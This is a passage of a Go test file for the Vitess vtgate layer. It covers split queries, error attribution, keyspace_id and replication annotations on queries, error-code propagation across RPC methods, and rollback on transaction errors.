if !reflect.DeepEqual(actualSqlsByKeyRange, expectedSqlsByKeyRange) {
t.Errorf(
"splits contain the wrong sqls and/or keyranges, "+
"got:\n%+v\n, want:\n%+v\n. testCase:\n%+v",
actualSqlsByKeyRange, expectedSqlsByKeyRange, testCase)
}
}
}
func TestVTGateSplitQueryUnsharded(t *testing.T) {
keyspace := KsTestUnsharded
createSandbox(keyspace)
hcVTGateTest.Reset()
hcVTGateTest.AddTestTablet("aa", "1.1.1.1", 1001, keyspace, "0", topodatapb.TabletType_RDONLY, true, 1, nil)
sql := "select col1, col2 from table"
bindVars := map[string]interface{}{"bv1": nil}
splitColumns := []string{"sc1", "sc2"}
algorithm := querypb.SplitQueryRequest_FULL_SCAN
type testCaseType struct {
splitCount int64
numRowsPerQueryPart int64
}
testCases := []testCaseType{
{splitCount: 100, numRowsPerQueryPart: 0},
{splitCount: 0, numRowsPerQueryPart: 123},
}
for _, testCase := range testCases {
splits, err := rpcVTGate.SplitQuery(
context.Background(),
keyspace,
sql,
bindVars,
splitColumns,
testCase.splitCount,
testCase.numRowsPerQueryPart,
algorithm)
if err != nil {
t.Errorf("got %v, want: nil. testCase: %+v", err, testCase)
}
// Total number of splits should be number of shards (1) as our sandbox returns a single split
// for its fake implementation of SplitQuery.
if len(splits) != 1 {
t.Errorf("wrong number of splits, got %+v, want %+v. testCase:\n%+v",
len(splits), 1, testCase)
continue
}
split := splits[0]
if split.KeyRangePart != nil {
t.Errorf("KeyRangePart should not be populated. Got:\n%+v\n, testCase:\n%+v\n",
keyspace, split.KeyRangePart)
}
if split.ShardPart.Keyspace != keyspace {
t.Errorf("wrong keyspace, got \n%+v, want \n%+v. testCase:\n%+v",
keyspace, split.ShardPart.Keyspace, testCase)
}
if len(split.ShardPart.Shards) != 1 {
t.Errorf("wrong number of shards, got \n%+v, want \n%+v. testCase:\n%+v",
1, len(split.ShardPart.Shards), testCase)
}
expectedShard := "0"
expectedSQL := fmt.Sprintf(
"query:%v, splitColumns:%v, splitCount:%v,"+
" numRowsPerQueryPart:%v, algorithm:%v, shard:%v",
querytypes.BoundQuery{Sql: sql, BindVariables: bindVars},
splitColumns,
testCase.splitCount,
testCase.numRowsPerQueryPart,
algorithm,
expectedShard,
)
if split.Query.Sql != expectedSQL {
t.Errorf("got:\n%v\n, want:\n%v\n, testCase:\n%+v",
split.Query.Sql, expectedSQL, testCase)
}
}
}
func TestIsErrorCausedByVTGate(t *testing.T) {
unknownError := fmt.Errorf("unknown error")
serverError := &tabletconn.ServerError{
ServerCode: vtrpcpb.ErrorCode_QUERY_NOT_SERVED,
Err: "vttablet: retry: error message",
}
shardConnUnknownErr := &gateway.ShardError{Err: unknownError}
shardConnServerErr := &gateway.ShardError{Err: serverError}
shardConnCancelledErr := &gateway.ShardError{Err: context.Canceled}
scatterConnErrAllUnknownErrs := &ScatterConnError{
Errs: []error{unknownError, unknownError, unknownError},
}
scatterConnErrMixed := &ScatterConnError{
Errs: []error{unknownError, shardConnServerErr, shardConnCancelledErr},
}
scatterConnErrAllNonVTGateErrs := &ScatterConnError{
Errs: []error{shardConnServerErr, shardConnServerErr, shardConnCancelledErr},
}
inputToWant := map[error]bool{
unknownError: true,
serverError: false,
context.Canceled: false,
// OperationalErrors that are not tabletconn.Cancelled might be from VTGate
tabletconn.ConnClosed: true,
// Errors wrapped in ShardConnError should get unwrapped
shardConnUnknownErr: true,
shardConnServerErr: false,
shardConnCancelledErr: false,
// We consider a ScatterConnErr with all unknown errors to be from VTGate
scatterConnErrAllUnknownErrs: true,
// We consider a ScatterConnErr with a mix of errors to be from VTGate
scatterConnErrMixed: true,
// If every error in ScatterConnErr list is caused by external components, we shouldn't
// consider the error to be from VTGate
scatterConnErrAllNonVTGateErrs: false,
}
for input, want := range inputToWant {
got := isErrorCausedByVTGate(input)
if got != want {
t.Errorf("isErrorCausedByVTGate(%v) => %v, want %v",
input, got, want)
}
}
}
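// For illustration only: a minimal sketch of the classification the table
// above encodes. The real isErrorCausedByVTGate lives elsewhere in this
// package; the helper name isFromVTGateSketch and its exact shape are
// hypothetical, not the actual implementation.
//
//	func isFromVTGateSketch(err error) bool {
//		switch e := err.(type) {
//		case *gateway.ShardError:
//			// Wrapped errors get unwrapped first.
//			return isFromVTGateSketch(e.Err)
//		case *ScatterConnError:
//			// Any vtgate-attributable sub-error implicates vtgate.
//			for _, sub := range e.Errs {
//				if isFromVTGateSketch(sub) {
//					return true
//				}
//			}
//			return false
//		case *tabletconn.ServerError:
//			// Produced by the tablet, not vtgate.
//			return false
//		}
//		// Cancellations come from the caller; other unknown errors default to vtgate.
//		return err != context.Canceled
//	}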
// Functions for testing
// keyspace_id and 'filtered_replication_unfriendly'
// annotations.
func TestAnnotatingExecuteKeyspaceIds(t *testing.T) {
keyspace, shards := setUpSandboxWithTwoShards("TestAnnotatingExecuteKeyspaceIds")
_, err := rpcVTGate.ExecuteKeyspaceIds(
context.Background(),
"INSERT INTO table () VALUES();",
nil,
keyspace,
[][]byte{{0x10}},
topodatapb.TabletType_MASTER,
nil,
false,
nil)
if err != nil {
t.Fatalf("want nil, got %v", err)
}
verifyQueryAnnotatedWithKeyspaceID(t, []byte{0x10}, shards[0])
}
func TestAnnotatingExecuteKeyspaceIdsMultipleIds(t *testing.T) {
keyspace, shards := setUpSandboxWithTwoShards("TestAnnotatingExecuteKeyspaceIdsMultipleIds")
_, err := rpcVTGate.ExecuteKeyspaceIds(
context.Background(),
"INSERT INTO table () VALUES();",
nil,
keyspace,
[][]byte{{0x10}, {0x15}},
topodatapb.TabletType_MASTER,
nil,
false,
nil)
if err == nil || !strings.Contains(err.Error(), "DML should not span multiple keyspace_ids") {
t.Fatalf("want specific error, got %v", err)
}
// Currently, there's logic in resolver.go for rejecting
// multiple-ids DMLs, so we expect 0 queries here.
verifyNumQueries(t, 0, shards[0].Queries)
}
func TestAnnotatingExecuteKeyRanges(t *testing.T) {
keyspace, shards := setUpSandboxWithTwoShards("TestAnnotatingExecuteKeyRanges")
_, err := rpcVTGate.ExecuteKeyRanges(
context.Background(),
"UPDATE table SET col1=1 WHERE col2>3;",
nil,
keyspace,
[]*topodatapb.KeyRange{{Start: []byte{0x10}, End: []byte{0x40}}},
topodatapb.TabletType_MASTER,
nil,
false,
nil)
if err != nil {
t.Fatalf("want nil, got %v", err)
}
// Keyrange spans both shards.
verifyQueryAnnotatedAsUnfriendly(t, shards[0])
verifyQueryAnnotatedAsUnfriendly(t, shards[1])
}
func TestAnnotatingExecuteEntityIds(t *testing.T) {
keyspace, shards := setUpSandboxWithTwoShards("TestAnnotatingExecuteEntityIds")
_, err := rpcVTGate.ExecuteEntityIds(
context.Background(),
"INSERT INTO table () VALUES();",
nil,
keyspace,
"entity_column_name",
[]*vtgatepb.ExecuteEntityIdsRequest_EntityId{
{
Type: sqltypes.Int64,
Value: []byte("0"),
KeyspaceId: []byte{0x10}, // First shard.
},
{
Type: sqltypes.Int64,
Value: []byte("1"),
KeyspaceId: []byte{0x25}, // Second shard.
},
},
topodatapb.TabletType_MASTER,
nil,
false,
nil)
if err != nil {
t.Fatalf("want nil, got %v", err)
}
verifyQueryAnnotatedAsUnfriendly(t, shards[0])
verifyQueryAnnotatedAsUnfriendly(t, shards[1])
}
func TestAnnotatingExecuteShards(t *testing.T) {
keyspace, shards := setUpSandboxWithTwoShards("TestAnnotatingExecuteShards")
_, err := rpcVTGate.ExecuteShards(
context.Background(),
"INSERT INTO table () VALUES();",
nil,
keyspace,
[]string{"20-40"},
topodatapb.TabletType_MASTER,
nil,
false,
nil)
if err != nil {
t.Fatalf("want nil, got %v", err)
}
verifyQueryAnnotatedAsUnfriendly(t, shards[1])
}
func TestAnnotatingExecuteBatchKeyspaceIds(t *testing.T) {
keyspace, shards := setUpSandboxWithTwoShards("TestAnnotatingExecuteBatchKeyspaceIds")
_, err := rpcVTGate.ExecuteBatchKeyspaceIds(
context.Background(),
[]*vtgatepb.BoundKeyspaceIdQuery{
{
Query: &querypb.BoundQuery{
Sql: "INSERT INTO table () VALUES();",
},
Keyspace: keyspace,
KeyspaceIds: [][]byte{{0x10}},
},
{
Query: &querypb.BoundQuery{
Sql: "UPDATE table SET col1=1 WHERE col2>3;",
},
Keyspace: keyspace,
KeyspaceIds: [][]byte{{0x15}},
},
{
Query: &querypb.BoundQuery{
Sql: "DELETE FROM table WHERE col1==4;",
},
Keyspace: keyspace,
KeyspaceIds: [][]byte{{0x25}},
},
},
topodatapb.TabletType_MASTER,
false,
nil,
nil)
if err != nil {
t.Fatalf("want nil, got %v", err)
}
verifyBatchQueryAnnotatedWithKeyspaceIds(
t,
[][]byte{{0x10}, {0x15}},
shards[0])
verifyBatchQueryAnnotatedWithKeyspaceIds(
t,
[][]byte{{0x25}},
shards[1])
}
func TestAnnotatingExecuteBatchKeyspaceIdsMultipleIds(t *testing.T) {
keyspace, shards := setUpSandboxWithTwoShards("TestAnnotatingExecuteBatchKeyspaceIdsMultipleIds")
_, err := rpcVTGate.ExecuteBatchKeyspaceIds(
context.Background(),
[]*vtgatepb.BoundKeyspaceIdQuery{
{
Query: &querypb.BoundQuery{
Sql: "INSERT INTO table () VALUES();",
},
Keyspace: keyspace,
KeyspaceIds: [][]byte{
{0x10},
{0x15},
},
},
},
topodatapb.TabletType_MASTER,
false,
nil,
nil)
if err != nil {
t.Fatalf("want nil, got %v", err)
}
verifyBatchQueryAnnotatedAsUnfriendly(
t,
1, // expectedNumQueries
shards[0])
}
func TestAnnotatingExecuteBatchShards(t *testing.T) {
keyspace, shards := setUpSandboxWithTwoShards("TestAnnotatingExecuteBatchShards")
_, err := rpcVTGate.ExecuteBatchShards(
context.Background(),
[]*vtgatepb.BoundShardQuery{
{
Query: &querypb.BoundQuery{
Sql: "INSERT INTO table () VALUES();",
},
Keyspace: keyspace,
Shards: []string{"-20", "20-40"},
},
{
Query: &querypb.BoundQuery{
Sql: "UPDATE table SET col1=1 WHERE col2>3;",
},
Keyspace: keyspace,
Shards: []string{"-20"},
},
{
Query: &querypb.BoundQuery{
Sql: "UPDATE table SET col1=1 WHERE col2>3;",
},
Keyspace: keyspace,
Shards: []string{"20-40"},
},
{
Query: &querypb.BoundQuery{
Sql: "DELETE FROM table WHERE col1==4;",
},
Keyspace: keyspace,
Shards: []string{"20-40"},
},
},
topodatapb.TabletType_MASTER,
false,
nil,
nil)
if err != nil {
t.Fatalf("want nil, got %v", err)
}
verifyBatchQueryAnnotatedAsUnfriendly(
t,
2, // expectedNumQueries
shards[0])
verifyBatchQueryAnnotatedAsUnfriendly(
t,
3, // expectedNumQueries
shards[1])
}
// TODO(erez): Add testing annotations of vtgate.Execute (V3)
// Sets up a sandbox with two shards:
// the first named "-20" for the -20 keyrange, and
// the second named "20-40" for the 20-40 keyrange.
// It returns the created shards and as a convenience the given
// keyspace.
//
// NOTE: You should not call this method multiple times with
// the same 'keyspace' parameter: "shardGateway" caches connections
// for a keyspace, and may re-send queries to the shards created in
// a previous call to this method.
func setUpSandboxWithTwoShards(keyspace string) (string, []*sandboxconn.SandboxConn) {
shards := []*sandboxconn.SandboxConn{{}, {}}
createSandbox(keyspace)
hcVTGateTest.Reset()
shards[0] = hcVTGateTest.AddTestTablet("aa", "-20", 1, keyspace, "-20", topodatapb.TabletType_MASTER, true, 1, nil)
shards[1] = hcVTGateTest.AddTestTablet("aa", "20-40", 1, keyspace, "20-40", topodatapb.TabletType_MASTER, true, 1, nil)
return keyspace, shards
}
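// For illustration, TestAnnotatingExecuteShards above uses this helper roughly as:
//
//	keyspace, shards := setUpSandboxWithTwoShards("TestAnnotatingExecuteShards")
//	_, err := rpcVTGate.ExecuteShards(ctx, "INSERT ...", nil, keyspace, []string{"20-40"}, ...)
//	verifyQueryAnnotatedAsUnfriendly(t, shards[1])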
// Verifies that 'shard' was sent exactly one query and that it
// was annotated with 'expectedKeyspaceID'
func verifyQueryAnnotatedWithKeyspaceID(t *testing.T, expectedKeyspaceID []byte, shard *sandboxconn.SandboxConn) {
if !verifyNumQueries(t, 1, shard.Queries) {
return
}
verifyBoundQueryAnnotatedWithKeyspaceID(t, expectedKeyspaceID, &shard.Queries[0])
}
// Verifies that 'shard' was sent exactly one query and that it
// was annotated as unfriendly.
func verifyQueryAnnotatedAsUnfriendly(t *testing.T, shard *sandboxconn.SandboxConn) {
if !verifyNumQueries(t, 1, shard.Queries) {
return
}
verifyBoundQueryAnnotatedAsUnfriendly(t, &shard.Queries[0])
}
// Verifies 'queries' has exactly 'expectedNumQueries' elements.
// Returns true if verification succeeds.
func verifyNumQueries(t *testing.T, expectedNumQueries int, queries []querytypes.BoundQuery) bool {
numElements := len(queries)
if numElements != expectedNumQueries {
t.Errorf("want %v queries, got: %v (queries: %v)", expectedNumQueries, numElements, queries)
return false
}
return true
}
// Verifies 'batchQueries' has exactly 'expectedNumQueries' elements.
// Returns true if verification succeeds.
func verifyNumBatchQueries(t *testing.T, expectedNumQueries int, batchQueries [][]querytypes.BoundQuery) bool {
numElements := len(batchQueries)
if numElements != expectedNumQueries {
t.Errorf("want %v batch queries, got: %v (batch queries: %v)", expectedNumQueries, numElements, batchQueries)
return false
}
return true
}
func verifyBoundQueryAnnotatedWithKeyspaceID(t *testing.T, expectedKeyspaceID []byte, query *querytypes.BoundQuery) {
verifyBoundQueryAnnotatedWithComment(
t,
"/* vtgate:: keyspace_id:"+hex.EncodeToString(expectedKeyspaceID)+" */",
query)
}
func verifyBoundQueryAnnotatedAsUnfriendly(t *testing.T, query *querytypes.BoundQuery) {
verifyBoundQueryAnnotatedWithComment(
t,
"/* vtgate:: filtered_replication_unfriendly */",
query)
}
func verifyBoundQueryAnnotatedWithComment(t *testing.T, expectedComment string, query *querytypes.BoundQuery) {
if !strings.Contains(query.Sql, expectedComment) {
t.Errorf("want query '%v' to be annotated with '%v'", query.Sql, expectedComment)
}
}
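// For illustration, a query that satisfies verifyBoundQueryAnnotatedWithKeyspaceID
// for keyspace id 0x10 carries the comment below (the exact position of the
// comment within the SQL is not pinned down by this check):
//
//	INSERT INTO table () VALUES(); /* vtgate:: keyspace_id:10 */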
// Verifies that 'shard' was sent exactly one batch-query and that the
// queries in that batch are annotated with the elements of
// expectedKeyspaceIDs, in order.
func verifyBatchQueryAnnotatedWithKeyspaceIds(t *testing.T, expectedKeyspaceIDs [][]byte, shard *sandboxconn.SandboxConn) {
if !verifyNumBatchQueries(t, 1, shard.BatchQueries) {
return
}
verifyBoundQueriesAnnotatedWithKeyspaceIds(t, expectedKeyspaceIDs, shard.BatchQueries[0])
}
// Verifies that 'shard' was sent exactly one batch-query containing
// 'expectedNumQueries' queries, each annotated as unfriendly.
func verifyBatchQueryAnnotatedAsUnfriendly(t *testing.T, expectedNumQueries int, shard *sandboxconn.SandboxConn) {
if !verifyNumBatchQueries(t, 1, shard.BatchQueries) {
return
}
verifyBoundQueriesAnnotatedAsUnfriendly(t, expectedNumQueries, shard.BatchQueries[0])
}
func verifyBoundQueriesAnnotatedWithKeyspaceIds(t *testing.T, expectedKeyspaceIDs [][]byte, queries []querytypes.BoundQuery) {
if !verifyNumQueries(t, len(expectedKeyspaceIDs), queries) {
return
}
for i := range queries {
verifyBoundQueryAnnotatedWithKeyspaceID(t, expectedKeyspaceIDs[i], &queries[i])
}
}
func verifyBoundQueriesAnnotatedAsUnfriendly(t *testing.T, expectedNumQueries int, queries []querytypes.BoundQuery) {
if !verifyNumQueries(t, expectedNumQueries, queries) {
return
}
for i := range queries {
verifyBoundQueryAnnotatedAsUnfriendly(t, &queries[i])
}
}
func testErrorPropagation(t *testing.T, sbcs []*sandboxconn.SandboxConn, before func(sbc *sandboxconn.SandboxConn), after func(sbc *sandboxconn.SandboxConn), expected vtrpcpb.ErrorCode) {
// Execute
for _, sbc := range sbcs {
before(sbc)
}
_, err := rpcVTGate.Execute(context.Background(),
"select id from t1",
nil,
"",
topodatapb.TabletType_MASTER,
nil,
false,
nil)
if err == nil {
t.Errorf("error %v not propagated for Execute", expected)
} else {
ec := vterrors.RecoverVtErrorCode(err)
if ec != expected {
t.Errorf("unexpected error, got %v want %v: %v", ec, expected, err)
}
}
for _, sbc := range sbcs {
after(sbc)
}
// ExecuteShards
for _, sbc := range sbcs {
before(sbc)
}
_, err = rpcVTGate.ExecuteShards(context.Background(),
"query",
nil,
KsTestUnsharded,
[]string{"0"},
topodatapb.TabletType_MASTER,
nil,
false,
executeOptions)
if err == nil {
t.Errorf("error %v not propagated for ExecuteShards", expected)
} else {
ec := vterrors.RecoverVtErrorCode(err)
if ec != expected {
t.Errorf("unexpected error, got %v want %v: %v", ec, expected, err)
}
}
for _, sbc := range sbcs {
after(sbc)
}
// ExecuteKeyspaceIds
for _, sbc := range sbcs {
before(sbc)
}
_, err = rpcVTGate.ExecuteKeyspaceIds(context.Background(),
"query",
nil,
KsTestUnsharded,
[][]byte{{0x10}},
topodatapb.TabletType_MASTER,
nil,
false,
executeOptions)
if err == nil {
t.Errorf("error %v not propagated for ExecuteKeyspaceIds", expected)
} else {
ec := vterrors.RecoverVtErrorCode(err)
if ec != expected {
t.Errorf("unexpected error, got %v want %v: %v", ec, expected, err)
}
}
for _, sbc := range sbcs {
after(sbc)
}
// ExecuteKeyRanges
for _, sbc := range sbcs {
before(sbc)
}
_, err = rpcVTGate.ExecuteKeyRanges(context.Background(),
"query",
nil,
KsTestUnsharded,
[]*topodatapb.KeyRange{{End: []byte{0x20}}},
topodatapb.TabletType_MASTER,
nil,
false,
executeOptions)
if err == nil {
t.Errorf("error %v not propagated for ExecuteKeyRanges", expected)
} else {
ec := vterrors.RecoverVtErrorCode(err)
if ec != expected {
t.Errorf("unexpected error, got %v want %v: %v", ec, expected, err)
}
}
for _, sbc := range sbcs {
after(sbc)
}
// ExecuteEntityIds
for _, sbc := range sbcs {
before(sbc)
}
_, err = rpcVTGate.ExecuteEntityIds(context.Background(),
"query",
nil,
KsTestUnsharded,
"kid",
[]*vtgatepb.ExecuteEntityIdsRequest_EntityId{
{
Type: sqltypes.VarBinary,
Value: []byte("id1"),
KeyspaceId: []byte{0x10},
},
},
topodatapb.TabletType_MASTER,
nil,
false,
executeOptions)
if err == nil {
t.Errorf("error %v not propagated for ExecuteEntityIds", expected)
} else {
ec := vterrors.RecoverVtErrorCode(err)
if ec != expected {
t.Errorf("unexpected error, got %v want %v: %v", ec, expected, err)
}
}
for _, sbc := range sbcs {
after(sbc)
}
// ExecuteBatchShards
for _, sbc := range sbcs {
before(sbc)
}
_, err = rpcVTGate.ExecuteBatchShards(context.Background(),
[]*vtgatepb.BoundShardQuery{{
Query: &querypb.BoundQuery{
Sql: "query",
BindVariables: nil,
},
Keyspace: KsTestUnsharded,
Shards: []string{"0", "0"},
}, {
Query: &querypb.BoundQuery{
Sql: "query",
BindVariables: nil,
},
Keyspace: KsTestUnsharded,
Shards: []string{"0", "0"},
}},
topodatapb.TabletType_MASTER,
false,
nil,
executeOptions)
if err == nil {
t.Errorf("error %v not propagated for ExecuteBatchShards", expected)
} else {
ec := vterrors.RecoverVtErrorCode(err)
if ec != expected {
t.Errorf("unexpected error, got %v want %v: %v", ec, expected, err)
}
}
for _, sbc := range sbcs {
after(sbc)
}
// ExecuteBatchKeyspaceIds
for _, sbc := range sbcs {
before(sbc)
}
kid10 := []byte{0x10}
kid30 := []byte{0x30}
_, err = rpcVTGate.ExecuteBatchKeyspaceIds(context.Background(),
[]*vtgatepb.BoundKeyspaceIdQuery{{
Query: &querypb.BoundQuery{
Sql: "query",
BindVariables: nil,
},
Keyspace: KsTestUnsharded,
KeyspaceIds: [][]byte{kid10, kid30},
}, {
Query: &querypb.BoundQuery{
Sql: "query",
BindVariables: nil,
},
Keyspace: KsTestUnsharded,
KeyspaceIds: [][]byte{kid10, kid30},
}},
topodatapb.TabletType_MASTER,
false,
nil,
executeOptions)
if err == nil {
t.Errorf("error %v not propagated for ExecuteBatchShards", expected)
} else {
ec := vterrors.RecoverVtErrorCode(err)
if ec != expected {
t.Errorf("unexpected error, got %v want %v: %v", ec, expected, err)
}
}
for _, sbc := range sbcs {
after(sbc)
}
// StreamExecute
for _, sbc := range sbcs {
before(sbc)
}
err = rpcVTGate.StreamExecute(context.Background(),
"select id from t1",
nil,
"",
topodatapb.TabletType_MASTER,
executeOptions,
func(r *sqltypes.Result) error {
return nil
})
if err == nil {
t.Errorf("error %v not propagated for StreamExecute", expected)
} else {
ec := vterrors.RecoverVtErrorCode(err)
if ec != expected {
t.Errorf("unexpected error, got %v want %v: %v", ec, expected, err)
}
}
for _, sbc := range sbcs {
after(sbc)
}
// StreamExecuteShards
for _, sbc := range sbcs {
before(sbc)
}
err = rpcVTGate.StreamExecuteShards(context.Background(),
"query",
nil,
KsTestUnsharded,
[]string{"0"},
topodatapb.TabletType_MASTER,
executeOptions,
func(r *sqltypes.Result) error {
return nil
})
if err == nil {
t.Errorf("error %v not propagated for StreamExecuteShards", expected)
} else {
ec := vterrors.RecoverVtErrorCode(err)
if ec != expected {
t.Errorf("unexpected error, got %v want %v: %v", ec, expected, err)
}
}
for _, sbc := range sbcs {
after(sbc)
}
// StreamExecuteKeyspaceIds
for _, sbc := range sbcs {
before(sbc)
}
err = rpcVTGate.StreamExecuteKeyspaceIds(context.Background(),
"query",
nil,
KsTestUnsharded,
[][]byte{{0x10}},
topodatapb.TabletType_MASTER,
executeOptions,
func(r *sqltypes.Result) error {
return nil
})
if err == nil {
t.Errorf("error %v not propagated for StreamExecuteKeyspaceIds", expected)
} else {
ec := vterrors.RecoverVtErrorCode(err)
if ec != expected {
t.Errorf("unexpected error, got %v want %v: %v", ec, expected, err)
}
}
for _, sbc := range sbcs {
after(sbc)
}
// StreamExecuteKeyRanges
for _, sbc := range sbcs {
before(sbc)
}
err = rpcVTGate.StreamExecuteKeyRanges(context.Background(),
"query",
nil,
KsTestUnsharded,
[]*topodatapb.KeyRange{{End: []byte{0x20}}},
topodatapb.TabletType_MASTER,
executeOptions,
func(r *sqltypes.Result) error {
return nil
})
if err == nil {
t.Errorf("error %v not propagated for StreamExecuteKeyRanges", expected)
} else {
ec := vterrors.RecoverVtErrorCode(err)
if ec != expected {
t.Errorf("unexpected error, got %v want %v: %v", ec, expected, err)
}
}
for _, sbc := range sbcs {
after(sbc)
}
// Begin is skipped, it doesn't end up going to the tablet.
// Commit
for _, sbc := range sbcs {
before(sbc)
}
session := &vtgatepb.Session{
InTransaction: true,
ShardSessions: []*vtgatepb.Session_ShardSession{{
Target: &querypb.Target{
Keyspace: KsTestUnsharded,
Shard: "0",
TabletType: topodatapb.TabletType_MASTER,
},
TransactionId: 1,
}},
}
err = rpcVTGate.Commit(context.Background(), false, session)
if err == nil {
t.Errorf("error %v not propagated for Commit", expected)
} else {
ec := vterrors.RecoverVtErrorCode(err)
if ec != expected {
t.Errorf("unexpected error, got %v want %v: %v", ec, expected, err)
}
}
for _, sbc := range sbcs {
after(sbc)
}
// Rollback is skipped, it doesn't forward errors.
// SplitQuery
for _, sbc := range sbcs {
before(sbc)
}
_, err = rpcVTGate.SplitQuery(context.Background(),
KsTestUnsharded,
"select col1, col2 from table",
nil,
[]string{"sc1", "sc2"},
100,
0,
querypb.SplitQueryRequest_FULL_SCAN)
if err == nil {
t.Errorf("error %v not propagated for SplitQuery", expected)
} else {
ec := vterrors.RecoverVtErrorCode(err)
if ec != expected {
t.Errorf("unexpected error, got %v want %v: %v", ec, expected, err)
}
}
for _, sbc := range sbcs {
after(sbc)
}
}
// TestErrorPropagation tests an error returned by sandboxconn is
// properly propagated through vtgate layers. We need both a master
// tablet and a rdonly tablet because we don't control the routing of
// Commit nor SplitQuery{,V2}.
func TestErrorPropagation(t *testing.T) {
createSandbox(KsTestUnsharded)
hcVTGateTest.Reset()
sbcm := hcVTGateTest.AddTestTablet("aa", "1.1.1.1", 1001, KsTestUnsharded, "0", topodatapb.TabletType_MASTER, true, 1, nil)
sbcrdonly := hcVTGateTest.AddTestTablet("aa", "1.1.1.2", 1001, KsTestUnsharded, "0", topodatapb.TabletType_RDONLY, true, 1, nil)
sbcs := []*sandboxconn.SandboxConn{
sbcm,
sbcrdonly,
}
// ErrorCode_CANCELLED
testErrorPropagation(t, sbcs, func(sbc *sandboxconn.SandboxConn) {
sbc.MustFailCanceled = 20
}, func(sbc *sandboxconn.SandboxConn) {
sbc.MustFailCanceled = 0
}, vtrpcpb.ErrorCode_CANCELLED)
// ErrorCode_UNKNOWN_ERROR
testErrorPropagation(t, sbcs, func(sbc *sandboxconn.SandboxConn) {
sbc.MustFailUnknownError = 20
}, func(sbc *sandboxconn.SandboxConn) {
sbc.MustFailUnknownError = 0
}, vtrpcpb.ErrorCode_UNKNOWN_ERROR)
// ErrorCode_BAD_INPUT
testErrorPropagation(t, sbcs, func(sbc *sandboxconn.SandboxConn) {
sbc.MustFailServer = 20
}, func(sbc *sandboxconn.SandboxConn) {
sbc.MustFailServer = 0
}, vtrpcpb.ErrorCode_BAD_INPUT)
// ErrorCode_DEADLINE_EXCEEDED
testErrorPropagation(t, sbcs, func(sbc *sandboxconn.SandboxConn) {
sbc.MustFailDeadlineExceeded = 20
}, func(sbc *sandboxconn.SandboxConn) {
sbc.MustFailDeadlineExceeded = 0
}, vtrpcpb.ErrorCode_DEADLINE_EXCEEDED)
// ErrorCode_INTEGRITY_ERROR
testErrorPropagation(t, sbcs, func(sbc *sandboxconn.SandboxConn) {
sbc.MustFailIntegrityError = 20
}, func(sbc *sandboxconn.SandboxConn) {
sbc.MustFailIntegrityError = 0
}, vtrpcpb.ErrorCode_INTEGRITY_ERROR)
// ErrorCode_PERMISSION_DENIED
testErrorPropagation(t, sbcs, func(sbc *sandboxconn.SandboxConn) {
sbc.MustFailPermissionDenied = 20
}, func(sbc *sandboxconn.SandboxConn) {
sbc.MustFailPermissionDenied = 0
}, vtrpcpb.ErrorCode_PERMISSION_DENIED)
// ErrorCode_RESOURCE_EXHAUSTED
testErrorPropagation(t, sbcs, func(sbc *sandboxconn.SandboxConn) {
sbc.MustFailTxPool = 20
}, func(sbc *sandboxconn.SandboxConn) {
sbc.MustFailTxPool = 0
}, vtrpcpb.ErrorCode_RESOURCE_EXHAUSTED)
// ErrorCode_QUERY_NOT_SERVED
testErrorPropagation(t, sbcs, func(sbc *sandboxconn.SandboxConn) {
sbc.MustFailRetry = 20
}, func(sbc *sandboxconn.SandboxConn) {
sbc.MustFailRetry = 0
}, vtrpcpb.ErrorCode_QUERY_NOT_SERVED)
// ErrorCode_NOT_IN_TX
testErrorPropagation(t, sbcs, func(sbc *sandboxconn.SandboxConn) {
sbc.MustFailNotTx = 20
}, func(sbc *sandboxconn.SandboxConn) {
sbc.MustFailNotTx = 0
}, vtrpcpb.ErrorCode_NOT_IN_TX)
// ErrorCode_INTERNAL_ERROR
testErrorPropagation(t, sbcs, func(sbc *sandboxconn.SandboxConn) {
sbc.MustFailFatal = 20
}, func(sbc *sandboxconn.SandboxConn) {
sbc.MustFailFatal = 0
}, vtrpcpb.ErrorCode_INTERNAL_ERROR)
// ErrorCode_TRANSIENT_ERROR
testErrorPropagation(t, sbcs, func(sbc *sandboxconn.SandboxConn) {
sbc.MustFailTransientError = 20
}, func(sbc *sandboxconn.SandboxConn) {
sbc.MustFailTransientError = 0
}, vtrpcpb.ErrorCode_TRANSIENT_ERROR)
// ErrorCode_UNAUTHENTICATED
testErrorPropagation(t, sbcs, func(sbc *sandboxconn.SandboxConn) {
sbc.MustFailUnauthenticated = 20
}, func(sbc *sandboxconn.SandboxConn) {
sbc.MustFailUnauthenticated = 0
}, vtrpcpb.ErrorCode_UNAUTHENTICATED)
}
// This test makes sure that if we start a transaction and hit a critical
// error, a rollback is issued.
func TestErrorIssuesRollback(t *testing.T) {
createSandbox(KsTestUnsharded)
hcVTGateTest.Reset()
sbc := hcVTGateTest.AddTestTablet("aa", "1.1.1.1", 1001, KsTestUnsharded, "0", topodatapb.TabletType_MASTER, true, 1, nil)
// Start a transaction, send one statement.
// Simulate an error that should trigger a rollback:
// vtrpcpb.ErrorCode_NOT_IN_TX case.
session, err := rpcVTGate.Begin(context.Background(), false)
if err != nil {
t.Fatalf("cannot start a transaction: %v", err)
}
_, err = rpcVTGate.Execute(context.Background(),
"select id from t1",
nil,
"",
topodatapb.TabletType_MASTER,
session,
false,
nil)
if err != nil {
t.Fatalf("want nil, got %v", err)
}
if sbc.RollbackCount.Get() != 0 {
t.Errorf("want 0, got %d", sbc.RollbackCount.Get())
}
sbc.MustFailNotTx = 20
_, err = rpcVTGate.Execute(context.Background(),
"select id from t1",
nil,
"",
topodatapb.TabletType_MASTER,
session,
false,
nil)
if err == nil {
t.Fatalf("want error but got nil")
}
if sbc.RollbackCount.Get() != 1 {
t.Errorf("want 1, got %d", sbc.RollbackCount.Get())
}
sbc.RollbackCount.Set(0)
sbc.MustFailNotTx = 0
// Start a transaction, send one statement.
// Simulate an error that should trigger a rollback:
// vtrpcpb.ErrorCode_RESOURCE_EXHAUSTED case.
session, err = rpcVTGate.Begin(context.Background(), false)
if err != nil {
t.Fatalf("cannot start a transaction: %v", err)
}
_, err = rpcVTGate.Execute(context.Background(),
"select id from t1",
nil,
"",
topodatapb.TabletType_MASTER,
session,
false,
nil)
if err != nil {
t.Fatalf("want nil, got %v", err)
}
if sbc.RollbackCount.Get() != 0 {
t.Errorf("want 0, got %d", sbc.RollbackCount.Get())
}
sbc.MustFailTxPool = 20
_, err = rpcVTGate.Execute(context.Background(),
"select id from t1",
nil,
"",
topodatapb.TabletType_MASTER,
session,
false,
nil)
if err == nil {
t.Fatalf("want error but got nil")
}
if sbc.RollbackCount.Get() != 1 {
t.Errorf("want 1, got %d", sbc.RollbackCount.Get())
}
sbc.RollbackCount.Set(0)
sbc.MustFailTxPool = 0
// Start a transaction, send one statement.
